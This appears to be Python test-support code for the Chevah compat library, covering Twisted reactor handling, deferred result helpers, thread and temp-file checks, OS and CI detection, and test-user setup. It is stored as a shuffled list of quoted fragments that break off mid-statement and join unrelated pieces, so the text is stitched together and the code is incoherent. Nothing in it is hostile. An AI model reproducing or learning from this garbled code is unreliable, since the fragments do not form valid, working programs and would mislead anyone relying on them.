supported.') def folderInTemp(self, *args, **kwargs): \"\"\" Create", "-*- coding: utf-8 -*- # Copyright (c) 2011 <NAME>. #", "removed. The format is customized for Chevah Nose runner. This", "reactor. \"\"\" self._timeout_reached = True failure = AssertionError( 'Reactor took", "Run reactor until no more delayed calls, readers or writers", "Python 2.7 isInstance is already defined, but with swapped #", "returns `osx` followed by the version. It is not the", "reactor.threadpool and len(reactor.threadpool.working) > 0: raise_failure('active threads', reactor.threadCallQueue) pool_queue =", "mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) self._runDeferred(deferred) self.assertIsNotFailure(deferred) self.assertEqual('something',", "writers buffers: if len(reactor.getWriters()) > 0: have_callbacks = True continue", "[] self._cleanup_stack = [] self._teardown_errors = [] self.test_segments = None", "threads = threading.enumerate() if len(threads) > 1: for thread in", "def _checkTemporaryFiles(self): \"\"\" Check that no temporary files or folders", "OS. See: https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\" if os.name == 'nt': parts =", "debug mode, some test will fail as they # will", "second_values, msg, list) def assertSetEqual(self, first, second, msg): super(ChevahTestCase, self).assertSetEqual(first,", "def _threadPoolThreads(self): \"\"\" Return current threads from pool, or empty", "fake a clean reactor. reactor._startedBefore = False reactor._started = False", "\"\"\" return _get_hostname() @classmethod def initialize(cls, drop_user): \"\"\" Initialize the", "import sys import time from bunch import Bunch from mock", "os_name == 'sunos': parts = platform.release().split('.') return 'solaris-%s' % (parts[1],)", "super(ChevahTestCase, self).assertRaises if callback is None: return super_assertRaises(exception_class) with super_assertRaises(exception_class)", "self.executeReactor() result = transport.value() self.assertStartsWith('211-Features:\\n', result) \"\"\" if timeout is", "name): \"\"\" Return `True` if is OK for thread to", "= u'First is unicode while second is str for \"%s\".'", "that need a dedicated local OS account present. \"\"\" #:", "= True continue for reader in reactor.getReaders(): have_callbacks = True", "prevent_stop=False): \"\"\" Run the deferred and return the result. Usage::", "it is the `nt` followed by the major and minor", "# required to wait for them when running the reactor.", "for a deferred to have a result. DEFERRED_TIMEOUT = 1", "the tearDown. # No need for the full thread name", "\"\"\" if ( isinstance(first, text_type) and not isinstance(second, text_type) ):", "change to get a \"root\" deferred. In most tests you", "all file-system tests using a real OS account. \"\"\" @classmethod", "time.time() @classmethod def cleanTemporaryFolder(cls): \"\"\" Clean all test files from", "\"\"\" Clean all test files from temporary folder. Return a", "for cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.folderInTemp(*args, **kwargs) def", "reactor for testing. \"\"\" self._timeout_reached = False # Set up", "neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called, or that the", "files from temporary folder. Return a list of members which", "an # interval of at most 1 second. if t2", "'posix': import resource return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family == 'nt': from", "timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsNotFailure(deferred) return deferred.result def assertWasCalled(self, deferred):", "in bytes, instead of Kilobytes. return int(peak_working_set_size) else: raise AssertionError('OS", "\"\"\" Raise assertion error if deferred is a Failure. The", "if not inspect.isclass(expected_type): expected_type, value = value, expected_type if not", "self._reactor_timeout_call.cancel() if prevent_stop: # Don't continue with stop procedure. return", "noqa:cover raise_failure('readers', text_type(reactor.getReaders())) for delayed_call in reactor.getDelayedCalls(): if delayed_call.active(): delayed_str", "to restore them. reactor.addSystemEventTrigger( 'during', 'startup', reactor._reallyStartRunning) def _assertReactorIsClean(self): \"\"\"", "reactor.threadpool and len(reactor.threadpool.working) > 0: have_callbacks = True continue self._shutdownTestReactor()", "thread_name, threads))) super(ChevahTestCase, self).tearDown() errors, self._teardown_errors = self._teardown_errors, None if", "= [first[key] for key in first_keys] second_values = [second[key] for", "called at the end of a stacked cleanup. \"\"\" self.callCleanup()", "*expectedExceptionTypes): \"\"\" Return the current failure result of C{deferred} or", "*args, **kwargs): \"\"\" Wrapper around the stdlib call to allow", "timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) # Set it", "None: timeout = self.DEFERRED_TIMEOUT try: self._initiateTestReactor(timeout=timeout) self._executeDeferred(deferred, timeout, debug=debug) finally:", "a list of members which were removed. \"\"\" return cls._cleanFolder(mk.fs.temp_segments)", "second_keys, msg, list) self.assertSequenceEqual(first_values, second_values, msg, list) def assertSetEqual(self, first,", "cls.os_family == 'nt': from wmi import WMI local_wmi = WMI('.')", "timeout=None, debug=False, prevent_stop=False): \"\"\" Run the deferred and return the", "transforms an failure into result `None` so that the failure", "cls._drop_user # Test suite should be started as root and", "testing environment. \"\"\" cls._drop_user = drop_user os.environ['DROP_USER'] = drop_user if", "Bunch from mock import patch, Mock from nose import SkipTest", "Check that deferred is a failure. \"\"\" if not isinstance(deferred.result,", "at cleanup as it removes elements from the Twisted thread", "# Move all filesystem checks into a specialized class if", "AssertionError( 'Reactor is not clean. %s: %s' % (location, reason))", "to be called and the first failure is raised. \"\"\"", "second, msg) first_keys = sorted(first.keys()) second_keys = sorted(second.keys()) first_values =", "**kwargs): \"\"\" Create a folder in the default temp folder", "( _SocketWaker, _UnixWaker, _SIGCHLDWaker ) from twisted.python.failure import Failure except", "over.\\n %s' % ( '\\n'.join(errors)))) def shortDescription(self): # noqa:cover \"\"\"", "raise_failure('delayed calls', delayed_str) def _runDeferred( self, deferred, timeout=None, debug=False, prevent_stop=False):", "level[0].f_locals['success'] break except KeyError: success_state = None if success_state is", "not reactor.threadpool: return [] else: return reactor.threadpool.threads def _threadPoolWorking(self): \"\"\"", "automatically removed. \"\"\" return mk.fs.pathInTemp( cleanup=self.addCleanup, prefix=prefix, suffix=suffix) def tempFile(self,", "another L{Deferred<twisted.internet.defer.Deferred>} for a result. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException:", "iterations.pop(0), timeout=timeout, debug=debug, prevent_stop=False, ) def iterateReactorForSeconds(self, duration=1, debug=False): \"\"\"", "= os.environ['USER'] cls.cleanTemporaryFolder() @classmethod def dropPrivileges(cls): '''Drop privileges to normal", "have_callbacks = True continue # Look at delayed calls. for", "Chevah Nose runner. This is only called when we run", "Import reactor last in case some other modules are changing", "from other source. pass reactor.threadCallQueue = [] for delayed_call in", "enterCleanup(self): \"\"\" Called when start using stacked cleanups. \"\"\" self._cleanup_stack.append(self.__cleanup__)", "raise AssertionError( 'Deferred took more than %d to execute.' %", "hostname = _get_hostname() Bunch = Bunch Mock = Mock #:", "chevah.compat.testing.filesystem import LocalTestFilesystem # For Python below 2.7 we use", "startup events, so we need # to restore them. reactor.addSystemEventTrigger(", "self._teardown_errors = [] self.test_segments = None def tearDown(self): self.callCleanup() self._checkTemporaryFiles()", "\"\"\" Set-up OS user for file system testing. \"\"\" from", "like to use `getDeferredFailure` or `getDeferredResult`. Run the deferred in", "def iterateReactorWithStop(self, count=1, timeout=None, debug=False): \"\"\" Iterate the reactor and", "value. reactor.doIteration(0.000001) def _shutdownTestReactor(self, prevent_stop=False): \"\"\" Called at the end", "self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks = False # Check for active jobs", "in os.environ and 'USER' not in os.environ: os.environ['USER'] = os.environ['LOGNAME']", "reactor except ImportError: reactor = None def _get_hostname(): \"\"\" Return", "assertIsNotFailure(self, deferred): \"\"\" Raise assertion error if deferred is a", "os.environ['USERNAME'] = cls._drop_user os.environ['USER'] = cls._drop_user # Test suite should", "= folder_segments[:] segments.append(member) if temp_filesystem.isFolder(segments): temp_filesystem.deleteFolder(segments, recursive=True) else: temp_filesystem.deleteFile(segments) return", "pool, or empty when threadpool does not exists or has", "= deferred.result while isinstance(result, Deferred): self._executeDeferred(result, timeout=timeout, debug=debug) result =", "\"\"\" self._timeout_reached = False # Set up timeout. self._reactor_timeout_call =", "next cleanups will continue to be called and the first", "not delayed.func: # Was already called. continue delayed_str = self._getDelayedCallName(delayed)", "member in (temp_filesystem.getFolderContent(folder_segments)): if only_marked and member.find(TEST_NAME_MARKER) == -1: continue", "See: https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX it returns `osx` followed by the", "FIXME:2099: # Windows XP reports value in bytes, instead of", "self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug) if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop)", "] # We assume that hostname does not change during", "in debug mode, some test will fail as they #", "['centos', 'ol']: # Normalize all RHEL variants. distro_name = 'rhel'", "as it removes elements from the Twisted thread queue, which", "the reactor. EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS = [ _UnixWaker, _SocketWaker,", "%r instead\" % ( deferred, result[0])) def getDeferredResult( self, deferred,", "[] for member in (temp_filesystem.getFolderContent(folder_segments)): if only_marked and member.find(TEST_NAME_MARKER) ==", "Return current Unix timestamp. \"\"\" return time.time() @classmethod def cleanTemporaryFolder(cls):", "setUpTestUser(cls): \"\"\" Set-up OS user for file system testing. \"\"\"", "the end of test. Only use this for very high", "raise AssertionError('Failed to find \"success\" attribute.') return success def tearDown(self):", "LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def _get_ci_name(): \"\"\"", "before raising the error. self._shutdownTestReactor() raise AssertionError('Reactor was not stopped.')", "and stop it at the end. \"\"\" iterations = [False]", "\"\"\" Return working thread from pool, or empty when threadpool", "temp_members = [] for member in (temp_filesystem.getFolderContent(folder_segments)): if only_marked and", "folder and return its path and segments, which is auto", "as it will call lsb_release. import ld distro_name = ld.id()", "self._executeDeferred(deferred, timeout, debug=debug) finally: self._shutdownTestReactor( prevent_stop=prevent_stop) def _executeDeferred(self, deferred, timeout,", "that deferred is a failure. \"\"\" if not isinstance(deferred.result, Failure):", "current tasks of thread Pool, or [] when threadpool does", "def stackedCleanup(self): \"\"\" Context manager for stacked cleanups. \"\"\" try:", "1)[0] return '%s-%s' % (distro_name, distro_version) def _get_cpu_type(): \"\"\" Return", "don't care about it. for level in inspect.stack()[1:]: try: success_state", "list of members which were removed. \"\"\" return cls._cleanFolder(mk.fs.temp_segments) @classmethod", "on the deferred. It transforms an failure into result `None`", "msg = u'First is unicode while second is str for", "= u'First is str while second is unicode for \"%s\".'", "of members which were removed. \"\"\" return cls._cleanFolder(mk.fs.temp_segments) @classmethod def", "*args, **kwargs): \"\"\" Create a folder in the default temp", "> duration, timeout=duration + 0.1, debug=debug, prevent_stop=False, ) def _getDelayedCallName(self,", "try: delayed_calls.remove(self._reactor_timeout_call) except ValueError: # noqa:cover # Timeout might be", "current stack and we don't care about it. for level", "but got %s. %s\" % ( expected_type, type(value), msg)) def", "support is optional. _SocketWaker = None _UnixWaker = None _SIGCHLDWaker", "the tests, we run with a very small value. reactor.doIteration(0.000001)", "_SIGCHLDWaker = None from chevah.compat import ( DefaultAvatar, LocalFilesystem, process_capabilities,", "self._reactor_timeout_failure = None # We stop the reactor on failures.", "a dedicated local OS account present. \"\"\" #: User will", "# Arch has no version. return 'arch' if distro_name in", "\"\"\" Initialize the testing environment. \"\"\" cls._drop_user = drop_user os.environ['DROP_USER']", "result of C{deferred} or raise C{self.failException}. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>}", "= \" or \".join([ '.'.join((t.__module__, t.__name__)) for t in expectedExceptionTypes])", "'sunos': parts = platform.release().split('.') return 'solaris-%s' % (parts[1],) if os_name", "L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called on it and it has reached", "exist after test is done. \"\"\" for exception in self.excepted_threads:", "\"\"\" #: User will be created before running the test", "'Reactor took more than %.2f seconds to execute.' % timeout)", "text_type) ): # noqa:cover if not msg: msg = u'First", "= None if success_state is None: raise AssertionError('Failed to find", "raise AssertionError( 'Reactor is not clean. %s: %s' % (location,", "_CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES': return _CI_NAMES.AZURE if os.environ.get('CI',", "comes by default in Python 2.7. if sys.version_info[0:2] < (2,", "time.time() - start > duration, timeout=duration + 0.1, debug=debug, prevent_stop=False,", "WMI('.') query = ( u'SELECT PeakWorkingSetSize ' u'FROM Win32_Process '", "failure def _initiateTestReactor(self, timeout): \"\"\" Do the steps required to", "self.fail( \"Success result expected on %r, found no result instead\"", "the queues. Set run_once=True to only run the reactor once.", "= class_name.replace('.Test', ':Test') tests_start = class_name.find('.tests.') + 7 class_name =", "Return the CPU type as used in the brink.sh script.", "coding: utf-8 -*- # Copyright (c) 2011 <NAME>. # See", "( deferred,)) elif isinstance(result[0], Failure): self.fail( \"Success result expected on", "os.environ and 'USERNAME' not in os.environ: os.environ['USERNAME'] = os.environ['USER'] if", "_SocketWaker = None _UnixWaker = None _SIGCHLDWaker = None from", "stop reactor. reactor.stop() # Let the reactor run one more", "distro_name = 'rhel' distro_version = ld.version().split('.', 1)[0] return '%s-%s' %", "of the current system. \"\"\" return _get_hostname() @classmethod def initialize(cls,", "_initiateTestReactor(self, timeout): \"\"\" Do the steps required to initiate a", "isinstance(deferred, Deferred): raise AssertionError('This is not a deferred.') if timeout", "start/stop the reactor during tests. \"\"\" # Number of second", "self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed calls', delayed_str) def _runDeferred( self, deferred, timeout=None,", "% (errors,)) def _isExceptedThread(self, name): \"\"\" Return `True` if is", "= mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) result =", "0.1, debug=debug, prevent_stop=False, ) def _getDelayedCallName(self, delayed_call): \"\"\" Return a", "suffix=suffix) def tempFile(self, content='', prefix='', suffix='', cleanup=True): \"\"\" Return (path,", "This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called on it", "% ( first,) raise AssertionError(msg.encode('utf-8')) return super(ChevahTestCase, self)._baseAssertEqual( first, second,", "of second to wait for a deferred to have a", "the reactor on failures. self._shutdownTestReactor() raise AssertionError( 'executeDelayedCalls took more", "@classmethod def _cleanReactor(cls): \"\"\" Remove all delayed calls, readers and", "test and this # should save a few DNS queries.", "kwargs['cleanup'] = self.addCleanup return mk.fs.folderInTemp(*args, **kwargs) def fileInTemp(self, *args, **kwargs):", "@classmethod def setUpTestUser(cls): \"\"\" Set-up OS user for file system", "and we don't care about it. for level in inspect.stack()[1:]:", "not clean. %s: %s' % (location, reason)) if reactor._started: #", "debug=False, prevent_stop=True): \"\"\" Run the reactor until callable returns `True`.", "handled. \"\"\" deferred.addErrback(lambda failure: None) def assertIsFailure(self, deferred): \"\"\" Check", "second_element in zip(first, second): self.assertEqual(first_element, second_element) def assertDictEqual(self, first, second,", "0: raise_failure('queued threads', reactor.threadCallQueue) if reactor.threadpool and len(reactor.threadpool.working) > 0:", "# Initialized only to clean the home folder. test_filesystem =", "pass if not delayed_calls: break self._shutdownTestReactor(prevent_stop=True) if self._reactor_timeout_failure is not", "\"Failure result expected on %r, \" \"found success result (%r)", ") ) t2 = reactor.timeout() # For testing we want", "if not reactor.threadpool: return [] else: return reactor.threadpool.threads def _threadPoolWorking(self):", "Run the reactor until callable returns `True`. \"\"\" if timeout", "deferred returns another deferred. Usage:: checker = mk.credentialsChecker() credentials =", "errors, self._teardown_errors = self._teardown_errors, None if errors: raise AssertionError('Cleanup errors:", "platform.version().split('.') return 'nt-%s.%s' % (parts[0], parts[1]) # We are now", "raise AssertionError('Reactor was not stopped.') # Look at threads queue.", "\"\"\" Return hostname as resolved by default DNS resolver. \"\"\"", "debug=False): \"\"\" Iterate the reactor for `duration` seconds.. \"\"\" start", "since it detects that internal state # is changed from", "None: return def raise_failure(location, reason): raise AssertionError( 'Reactor is not", "Twisted 13 result = [] def cb(res): result.append(res) return res", "the tests are currently executed. \"\"\" if os.environ.get('BUILDBOT', '').lower() ==", "# Timeout might be no longer be there. pass if", "filesystem checks into a specialized class if self.test_segments: if mk.fs.isFolder(self.test_segments):", "files or folders left over.\\n %s' % ( '\\n'.join(errors)))) def", "error into the reactor. \"\"\" self.assertWasCalled(deferred) if isinstance(deferred.result, Failure): error", "[ 'MainThread', 'threaded_reactor', 'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ] # We", "False def addCleanup(self, function, *args, **kwargs): \"\"\" Overwrite unit-test behaviour", "Move all filesystem checks into a specialized class if self.test_segments:", "tempFile(self, content='', prefix='', suffix='', cleanup=True): \"\"\" Return (path, segments) for", "if len(reactor.threadCallQueue) > 0: have_callbacks = True continue if reactor.threadpool", "os.environ.get('BUILDBOT', '').lower() == 'true': return _CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS', '').lower() ==", "than %d to execute.' % timeout) # Check executing all", "\"\"\" Run reactor until no more delayed calls, readers or", "a deferred. _reactor_timeout_call = None def setUp(self): super(TwistedTestCase, self).setUp() self._timeout_reached", "> 0: raise_failure('queued threads', reactor.threadCallQueue) if reactor.threadpool and len(reactor.threadpool.working) >", "not isinstance(deferred, Deferred): raise AssertionError('This is not a deferred.') if", "at least for delayed calls. if have_callbacks: continue if run_once:", "(path, segments) for a path which is not created yet.", "= _get_os_version() cpu_type = process_capabilities.cpu_type ci_name = _get_ci_name() CI =", "C{deferred} is left unchanged. Otherwise, any L{failure.Failure} result is swallowed.", "yet. \"\"\" return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def tempPathCleanup(self, prefix='', suffix=''): \"\"\"", "_cleanFolder(cls, folder_segments, only_marked=False): \"\"\" Clean all test files from folder_segments.", "slow down all the tests, we run with a very", "are scheduled. This will wait for delayed calls to be", "timeout is None: timeout = self.DEFERRED_TIMEOUT try: self._initiateTestReactor(timeout=timeout) self._executeDeferred(deferred, timeout,", "= True break if not excepted: # noqa:cover raise_failure('readers', text_type(reactor.getReaders()))", "not result: self.fail( \"Success result expected on %r, found no", "timeout, debug=debug) finally: self._shutdownTestReactor( prevent_stop=prevent_stop) def _executeDeferred(self, deferred, timeout, debug):", "= sorted(second.keys()) first_values = [first[key] for key in first_keys] second_values", "Was already called. continue delayed_str = self._getDelayedCallName(delayed) is_exception = False", "cleaning. if cls._environ_user == cls._drop_user: temp_avatar = SuperAvatar() else: temp_avatar", "thread: %s - %s' % ( thread_name, threads))) super(ChevahTestCase, self).tearDown()", "only_marked and member.find(TEST_NAME_MARKER) == -1: continue temp_members.append(member) segments = folder_segments[:]", "context.exception def assertSequenceEqual(self, first, second, msg, seq_type): super(ChevahTestCase, self).assertSequenceEqual( first,", "is None: timeout = self.DEFERRED_TIMEOUT try: self._initiateTestReactor(timeout=timeout) self._executeDeferred(deferred, timeout, debug=debug)", "= False break if have_callbacks: break if have_callbacks: continue #", "skipTest(message=''): '''Return a SkipTest exception.''' return SkipTest(message) @property def _caller_success_member(self):", "WMI local_wmi = WMI('.') query = ( u'SELECT PeakWorkingSetSize '", "still contains delayed deferred.\\n' '%s' % (self._reactorQueueToString())) break # Look", "# noqa:cover return 'aix-%s.%s' % (platform.version(), platform.release()) if os_name !=", "raise cls.skipTest() super(FileSystemTestCase, cls).setUpClass() cls.os_user = cls.setUpTestUser() home_folder_path = system_users.getHomeFolder(", "import contextlib import inspect import threading import os import platform", "timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsFailure(deferred) failure = deferred.result self.ignoreFailure(deferred) return", "not result[0].check(*expectedExceptionTypes)): expectedString = \" or \".join([ '.'.join((t.__module__, t.__name__)) for", "check in checks: try: check() except AssertionError as error: errors.append(error.message)", "def tearDown(self): try: if self._caller_success_member: # Check for a clean", "temp_members.append(member) segments = folder_segments[:] segments.append(member) if temp_filesystem.isFolder(segments): temp_filesystem.deleteFolder(segments, recursive=True) else:", "name. We only support the Windows NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases", "_CI_NAMES.GITHUB if os.environ.get('TRAVIS', '').lower() == 'true': return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE',", "None _SIGCHLDWaker = None from chevah.compat import ( DefaultAvatar, LocalFilesystem,", "the reactor. # To not slow down all the tests,", "the reactor. from twisted.internet import reactor except ImportError: reactor =", "to have a much better debug output. # Otherwise the", "AssertionError( 'Deferred contains a failure: %s' % (error)) def _get_os_version():", "= mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) if cleanup: self.addCleanup(mk.fs.deleteFile, segments)", "Mock = Mock #: Obsolete. Please use self.patch and self.patchObject.", "done. \"\"\" for exception in self.excepted_threads: if name in exception:", "if len(reactor.getWriters()) > 0: # noqa:cover raise_failure('writers', text_type(reactor.getWriters())) for reader", "\"\"\" Called at the end of a test reactor run.", "base == 'aarch64': return 'arm64' if base == 'x86_64': return", "\"\"\" for exception in self.excepted_threads: if name in exception: return", "from __future__ import absolute_import from six import text_type from six.moves", "exception in self.excepted_threads: if name in exception: return True if", "u'First is str while second is unicode for \"%s\".' %", "while isinstance(result, Deferred): self._executeDeferred(result, timeout=timeout, debug=debug) result = deferred.result def", "effective user # privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''): '''Return a", "already defined, but with swapped # arguments. if not inspect.isclass(expected_type):", "if 'USER' in os.environ and 'USERNAME' not in os.environ: os.environ['USERNAME']", "__future__ import absolute_import from six import text_type from six.moves import", "exception: return True if exception in name: return True return", "exception.''' return SkipTest(message) @property def _caller_success_member(self): '''Retrieve the 'success' member", "second is str for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8'))", "test case for all file-system tests using a real OS", "Called when start using stacked cleanups. \"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ =", "deferred): \"\"\" Raise assertion error if deferred is a Failure.", "delayed calls. have_callbacks = True break # No need to", "we don't compare str with unicode. \"\"\" if ( isinstance(first,", "None for i in range(2, 6): try: success = inspect.stack()[i][0].f_locals['success']", "% (timeout,)) def executeReactorUntil( self, callable, timeout=None, debug=False, prevent_stop=True): \"\"\"", "if not excepted: # noqa:cover raise_failure('readers', text_type(reactor.getReaders())) for delayed_call in", "to be executed and will not stop the reactor. \"\"\"", "instead\" % ( deferred, result[0])) def getDeferredResult( self, deferred, timeout=None,", "testing. \"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user)", "method before tearDown. \"\"\" self.__cleanup__.append((function, args, kwargs)) def callCleanup(self): \"\"\"", "[] self.test_segments = None def tearDown(self): self.callCleanup() self._checkTemporaryFiles() threads =", "removed only at the end of test. Only use this", "than %.2f seconds to execute.' % timeout) self._reactor_timeout_failure = failure", "first_keys = sorted(first.keys()) second_keys = sorted(second.keys()) first_values = [first[key] for", "stdlib to swap the arguments. \"\"\" if source not in", "a failure result. @return: The result of C{deferred}. \"\"\" #", "except KeyError: success = None if success is None: raise", "reactor. EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS = [ _UnixWaker, _SocketWaker, _SIGCHLDWaker,", "if self._caller_success_member: # Check for a clean reactor at shutdown,", "a result. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>}", "current failure on the deferred. It transforms an failure into", "msg, seq_type) for first_element, second_element in zip(first, second): self.assertEqual(first_element, second_element)", ") def iterateReactorForSeconds(self, duration=1, debug=False): \"\"\" Iterate the reactor for", "queue still contains delayed deferred.\\n' '%s' % (self._reactorQueueToString())) break #", "for other things as we already know that we need", "it has reached the end of its callback chain and", "no longer be there. pass if not delayed_calls: break self._shutdownTestReactor(prevent_stop=True)", "\"\"\" return patch.object(*args, **kwargs) def now(self): \"\"\" Return current Unix", "%s. %s\" % ( expected_type, type(value), msg)) def tempPath(self, prefix='',", "the actual deferred execution. \"\"\" if not deferred.called: deferred_done =", "result. \"\"\" # FIXME:1370: # Remove / re-route this code", "for Chevah tests. Checks that temporary folder is clean at", "specific code. Provides support for running deferred and start/stop the", "/ re-route this code after upgrading to Twisted 13 result", "Arch has no version. return 'arch' if distro_name in ['centos',", "\"\"\" start = time.time() self.executeReactorUntil( lambda _: time.time() - start", "and self.patchObject. Patch = patch _environ_user = None _drop_user =", "a new file created in temp which is auto cleaned.", "'There are still active threads, ' 'beside the main thread:", "# Remove / re-route this code after upgrading to Twisted", "a new temp folder and return its path and segments,", "List of names for delayed calls which should not be", "about it. for level in inspect.stack()[1:]: try: success_state = level[0].f_locals['success']", "job. \"\"\" if not reactor.threadpool: return [] else: return reactor.threadpool.working", "expect - if provided, and the the exception wrapped by", "AssertionError('Deferred is not a failure.') def assertIsNotFailure(self, deferred): \"\"\" Raise", "and should not be used by normal tests. \"\"\" if", "\"\"\" if not deferred.called: raise AssertionError('This deferred was not called", "def setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__ = [] self._cleanup_stack = []", "- %s' % ( thread_name, threads))) super(ChevahTestCase, self).tearDown() errors, self._teardown_errors", "you linter. TestCase else: from unittest import TestCase try: #", "= mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) failure =", "will fail. @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no result,", "that temporary folder is clean at exit. \"\"\" os_name =", "for reader in reactor.getReaders(): excepted = False for reader_type in", "and from the fixtures/cleanup # code which is executed from", "messages will flood the output. print ( u'delayed: %s\\n' u'threads:", "prevent_stop=False): \"\"\" Called at the end of a test reactor", ") self.assertIsNotFailure(deferred) return deferred.result def assertWasCalled(self, deferred): \"\"\" Check that", "_get_hostname(): \"\"\" Return hostname as resolved by default DNS resolver.", "result instead:\\n%s\" % ( deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return", "is not an instance of `expected_type` \"\"\" # In Python", "this is just the os_name. On Linux is the distribution", "a reactor for testing. \"\"\" self._timeout_reached = False # Set", "`True`. \"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout)", "platform.release()) if os_name != 'linux': return process_capabilities.os_name # We delay", "lsb_release. import ld distro_name = ld.id() if distro_name == 'arch':", "isinstance(value, expected_type): raise AssertionError( \"Expecting type %s, but got %s.", "_CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true': return _CI_NAMES.GITHUB if os.environ.get('TRAVIS',", "end. \"\"\" iterations = [False] * (count - 1) iterations.append(True)", "# Set it to True to enter the first loop.", "callback chain and the last callback or errback returned a", "- %s.%s\" % ( self._testMethodName, class_name, self._testMethodName) def assertRaises(self, exception_class,", "FIXME:863: # When running threads tests the reactor touched from", "have a result. DEFERRED_TIMEOUT = 1 # List of names", "result = [] for delayed in reactor.getDelayedCalls(): # noqa:cover result.append(text_type(delayed.func))", "when we do multi-threading. pass def _raiseReactorTimeoutError(self, timeout): \"\"\" Signal", "def _shutdownTestReactor(self, prevent_stop=False): \"\"\" Called at the end of a", "cleaned. \"\"\" segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) if", "# interval of at most 1 second. if t2 is", "mk.fs.getAbsoluteRealPath('.') segments = mk.fs.getSegmentsFromRealPath(path) return cls._cleanFolder(segments, only_marked=True) @classmethod def _cleanFolder(cls,", "be executed and will not stop the reactor. \"\"\" if", "return mk.fs.pathInTemp( cleanup=self.addCleanup, prefix=prefix, suffix=suffix) def tempFile(self, content='', prefix='', suffix='',", "'USERNAME' in os.environ and 'USER' not in os.environ: os.environ['USER'] =", "failure: %s' % (error)) def _get_os_version(): \"\"\" On non-Linux this", "return success_state @staticmethod def patch(*args, **kwargs): \"\"\" Helper for generic", "if os_name == 'aix': # noqa:cover return 'aix-%s.%s' % (platform.version(),", "is already started. # This can happen if we prevent", "thread.getName() if self._isExceptedThread(thread_name): continue self._teardown_errors.append(AssertionError( 'There are still active threads,", "the L{Deferred<twisted.internet.defer.Deferred>} has no result, has a success result, or", "print_function from __future__ import division from __future__ import absolute_import from", "protocol.lineReceived('FEAT') self.executeReactor() result = transport.value() self.assertStartsWith('211-Features:\\n', result) \"\"\" if timeout", "and active thread. if len(reactor.threadCallQueue) > 0: have_callbacks = True", "is None: return def raise_failure(location, reason): raise AssertionError( 'Reactor is", ") from chevah.compat.testing.filesystem import LocalTestFilesystem # For Python below 2.7", "timeout, debug): \"\"\" Does the actual deferred execution. \"\"\" if", "changed from other source. pass reactor.threadCallQueue = [] for delayed_call", "were removed. \"\"\" if not mk.fs.exists(folder_segments): return [] # In", "return cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls): path = mk.fs.getAbsoluteRealPath('.') segments =", "Mock #: Obsolete. Please use self.patch and self.patchObject. Patch =", "list) def assertSetEqual(self, first, second, msg): super(ChevahTestCase, self).assertSetEqual(first, second, msg)", "during tests. \"\"\" # Number of second to wait for", "> 0: # noqa:cover raise_failure('writers', text_type(reactor.getWriters())) for reader in reactor.getReaders():", "if success_state is None: raise AssertionError('Failed to find \"success\" attribute.')", "= platform.version().split('.') return 'nt-%s.%s' % (parts[0], parts[1]) # We are", "happen if we prevent stop in a previous run. if", "queue', pool_queue) if self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool", "chained callbacks. result = deferred.result while isinstance(result, Deferred): self._executeDeferred(result, timeout=timeout,", "been called, or that the L{Deferred<twisted.internet.defer.Deferred>} is waiting on another", "mk.makeFTPProtocol() transport = mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol = protocol protocol.lineReceived('FEAT') self.executeReactor()", "local_wmi.query(query.encode('utf-8')) peak_working_set_size = int(result[0].PeakWorkingSetSize) # 